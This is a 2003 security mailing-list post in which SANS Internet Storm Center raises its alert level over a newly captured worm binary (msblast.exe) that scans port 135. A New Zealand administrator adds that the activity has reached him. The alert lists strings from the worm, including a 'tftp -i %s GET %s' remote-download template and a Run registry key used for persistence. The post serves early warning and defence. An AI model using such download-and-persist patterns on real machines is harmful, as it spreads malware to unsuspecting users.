[Dshield] infocon: yellow

Andy Hopkins Andy.Hopkins at healthAlliance.co.nz
Mon Aug 11 20:27:55 GMT 2003


FYI: Its started here in NZ at 02:30 local time

------------------------------------------
Andy Hopkins
Senior Unix & Firewall Administrator
healthAlliance

(+64) (9) 486 8944
(+64) (25) 285 2139

Disclaimer:
The views and information expressed in this e-Mail are actually mine,
because my partner says so!
healthAlliance doesn't necessarily agree with me either



-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Tuesday, 12 August 2003 06:24
To: list at dshield.org
Subject: [Dshield] infocon: yellow


This message was converted from multipart/signed to ascii armored
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQA/N99UR1p7hYJvB/wRAgmhAJ4xk51nJk53JB9o6tiTvPtIe+V3tACghYLN
FulyEetb4Gu8+9fysZN+ajg-----END PGP SIGNATURE-----

--
SHA1
_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list



More information about the list mailing list